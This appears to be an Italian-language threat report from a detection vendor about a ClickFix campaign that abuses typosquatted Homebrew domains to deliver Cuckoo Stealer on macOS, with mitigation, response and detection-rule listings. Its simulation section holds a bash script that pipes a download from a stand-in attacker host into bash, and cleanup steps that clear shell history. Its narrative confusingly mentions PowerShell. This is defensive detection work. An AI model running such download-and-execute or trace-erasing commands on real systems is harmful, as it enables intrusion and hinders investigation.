SOC Prime Bias: Medio

18 Feb 2026 14:39 UTC

Typosquatting su Homebrew Falsi Usati per Distribuire Cuckoo Stealer tramite ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Typosquatting su Homebrew Falsi Usati per Distribuire Cuckoo Stealer tramite ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Il rapporto descrive una campagna che sfrutta domini Homebrew con errori di battitura per indurre gli sviluppatori macOS a eseguire comandi “install” dannosi tramite la tecnica ClickFix. Una one-liner curl appositamente creata invia le vittime a un’infrastruttura controllata dall’attaccante, consegnando un loader per il furto di credenziali seguito dal malware Cuckoo Stealer. Il malware persiste tramite un LaunchAgent, rimuove gli attributi di quarantena ed esfiltra credenziali e dati di portafoglio su HTTPS. La rilevazione dovrebbe concentrarsi sui pattern dei comandi curl e sull’infrastruttura associata.

Indagine

I ricercatori hanno tracciato l’esca iniziale a homabrews.org, risolvendo a 5.255.123.244 nei Paesi Bassi e ospitando più domini simili (incluso raw.homabrews.org usato per la consegna). Lo script scaricato esegue un loop di autenticazione dscl per convalidare le credenziali macOS, quindi recupera un binario chiamato brew_agent. Nella seconda fase, Cuckoo Stealer crea un plist LaunchAgent, rimuove i flag di quarantena e comunica con il C2 usando lo scambio di chiavi X25519 con payload crittografati con XOR. La caccia all’infrastruttura ha rivelato una rete di almeno sei domini che condividono lo stesso IP di hosting.

Mitigazione

Educare gli sviluppatori a verificare gli URL di installazione di Homebrew e a evitare di copiare e incollare comandi non attendibili nel Terminale. Abilitare la registrazione dei comandi da riga e limitare i pattern in cui curl recupera script remoti per l’esecuzione immediata, specialmente gli one-liner “curl | sh”. La protezione degli endpoint dovrebbe allertare sulla creazione sospetta di LaunchAgent e sulla rimozione degli attributi di quarantena. Le difese di rete dovrebbero bloccare i domini dannosi noti e segnalare il traffico verso raw.homabrews.org e host correlati.

Risposta

Quando viene rilevato un comando curl sospetto, isolare l’endpoint, catturare lo script e il binario brew_agent, e raccogliere il plist LaunchAgent per l’analisi. Reimpostare le credenziali rubate e revocare i token compromessi, specialmente per browser, Keychain e portafogli di criptovaluta. Esaminare forensicamente la directory nascosta BrewUpdater, eventuali collegamenti creati e rimuovere i file dannosi. Aggiornare le rilevazioni con gli IOC estratti e monitorare il riutilizzo della stessa infrastruttura.

Flusso di Attacco

Rilevazioni

Attività Sospetta su Keychain (via process_creation)

Team SOC Prime
18 Feb 2026

Modifica Sospetta dei Permessi dei File nella Cartella Tmp di MacOS (via cmdline)

Team SOC Prime
18 Feb 2026

MacOS Sospetto – Posizioni e Nomi dei Plist (via file_event)

Team SOC Prime
18 Feb 2026

Accesso Sospetto a Credenziali Salvate nei Browser su MacOS (via process_creation)

Team SOC Prime
18 Feb 2026

Il Volume di Sistema MacOS è Stato Mutato Usando Osascript (via cmdline)

Team SOC Prime
18 Feb 2026

Possibile Raccolta Tramite Tentativo di Esecuzione di MacOS Screencapture (via cmdline)

Team SOC Prime
18 Feb 2026

Tentativo Sospetto di Esecuzione di Curl [MacOS] (via cmdline)

Team SOC Prime
18 Feb 2026

IOC (HashSha256) da rilevare: Typosquats Falsi di Homebrew Usati per Consegnare Cuckoo Stealer tramite ClickFix

Regole AI di SOC Prime
18 Feb 2026

IOC (SourceIP) da rilevare: Typosquats Falsi di Homebrew Usati per Consegnare Cuckoo Stealer tramite ClickFix

Regole AI di SOC Prime
18 Feb 2026

IOC (DestinationIP) da rilevare: Typosquats Falsi di Homebrew Usati per Consegnare Cuckoo Stealer tramite ClickFix

Regole AI di SOC Prime
18 Feb 2026

Rilevazione del Comando di Installazione MacOS Malevolo via ClickFix [Creazione Processo Linux]

Regole AI di SOC Prime
18 Feb 2026

Rilevazione di Dominio con Errori di Digitazione e IP Maligno nella Campagna ClickFix [Indicatori di Rete]

Regole AI di SOC Prime
18 Feb 2026

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere passato.

Motivazione: Questa sezione descrive l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevazione. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirano a generare esattamente la telemetria prevista dalla logica di rilevazione. Esempi astratti o non correlati porteranno a misdiagnosi.

  • Narrativa dell’Attacco & Comandi:
    Un attaccante ha ottenuto uno script PowerShell codificato dannoso ospitato su un server C2. Per evitare di scrivere file su disco, l’attaccante fluisce lo script direttamente in una shell Bash usando curl -fsSL e il -c flag. Il comando viene eseguito interattivamente da un account utente compromesso, imitando un installer “click-fix” legittimo. I passaggi sono:

    1. Risolve l’URL del payload dannoso (e.g., https://evil.example.com/payload.sh).
    2. Pipe il download in Bash, istruisce Bash a eseguire il contenuto con -c.
    3. Il payload esegue il furto di credenziali, crea un file nascosto e poi cancella lo script temporaneo (coprendo T1070.004).
  • Script di Test di Regressione:

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Simula un installer macOS malevolo (stile ClickFix)
    # -------------------------------------------------
    set -euo pipefail
    
    MALICIOUS_URL="https://evil.example.com/payload.sh"
    
    # Fluisce il payload direttamente in Bash con -c
    curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)"
    
    # Si assume che il payload stesso esegua le sue azioni dannose.
    # Per lo scopo del test, semplicemente emettiamo un marcatore.
    echo "Payload dannoso eseguito"
  • Comandi di Pulizia:

    # Rimuovere eventuali file che potrebbero essere stati creati dal payload
    rm -f /tmp/payload.sh
    # Opzionalmente, cancellare la cronologia dei comandi per ridurre le tracce forensi
    history -c